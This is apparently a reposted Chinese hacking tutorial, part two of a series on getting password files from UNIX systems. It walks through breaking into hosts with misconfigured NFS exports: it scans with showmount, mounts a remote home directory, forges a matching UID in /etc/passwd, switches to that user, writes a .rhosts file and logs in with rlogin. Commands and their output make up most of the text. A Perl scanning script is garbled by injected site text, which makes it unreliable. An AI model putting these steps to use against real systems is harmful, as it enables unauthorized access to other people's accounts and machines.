从UNIX系统获取密码档(二)

互联网   发布时间:2008-10-08 19:04:34   作者:佚名   我要评论
主题: 破解(Cracking)passwrd 文档 与新手交谈 困难的方法 利用mount命令获取访问权限 有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这:你进入一个很好的可以利用的系统(
OK,假设我们已有root权限,让我们开始!
可用shownmount命令显示另一系统是否有mountable的磁盘.
在root帐号下:
$root> showmount -e wwa.com
ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
噢,这个域名不成功,OK,没问题,找下一个:
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
 
注意上面的“everyone”,如果我们想从这家伙里安装linux 的话会很好.但我们是想打开用户的目录...所以继续下一个:
$root> showmount -e XXXXX.XXX ) {
chomp(?用户名:@HackBase.net密?码:
);
print "Now checking:?用户名:@HackBase.net密?码:
";
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program?用户名:@HackBase.net密?码:
|");
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">?用户名:@HackBase.net密?码:
.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all files and end the program.
close (DOMAINFILE);
0;
----------------- end of cmount.pl
OK,现在开始mounting(连接)磁盘.
假设我们运行showmount -e domain.com 并返回:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
我们想连接(mount) / 目录..哟呵…这家伙把整个系统都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
如果他把home目录设为共享(mountable)的话,命令为:
$root> mount -nt nfs domain.com:/home /tmp/mount
要umount系统的话,确信退出目录然后:
$root> umount /tmp/mount
 
先必须确定你已创建了共享(mount)目录(你可在系统任何地方创建).如果系统的/mnt目录是空的,你也可用它.
OK,下面动真格了:
bash# ls -al /mnt ; 确定/mnt是空的
ls: /mnt: No such file or directory ; 不存在这样的文件或目录 ;)
bash# mkdir /mnt ; 让我们为他建一个(/mnt目录)
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 开始 mount 这小家伙 ...
bash# cd /mnt ; 进入mounted的目录.
bash# ls ; 简单的dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ... oh 很好...
bash# cd home
bash# ls -l ; 列长目录... 这儿tom 看起来不错 ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; 注意到tom 是 302号使用者 ... hmmm 把他放进我们的passwd 文档中.
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帐号 ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; 注意上面,toms 的用户号没有了... 现在我们拥有了他的目录!
bash$ echo >>tom/.rhosts ; 在tom的目录里建一个名为 .rhosts 的文档
(bash$ ;在.rhosts中加入 号,每个人都能用rlogin到他的帐户。)
bash$ rlogin xxxxx.xxx 在我们的机器上我们是tom了 , 因此rlogin 上平台.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> 雅皮士们 ,我们进去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts
>
现在我们有了访问权限了,可以开始hack这个系统了.哦,这该是下一课了,先轻松一下吧。

相关文章

最新评论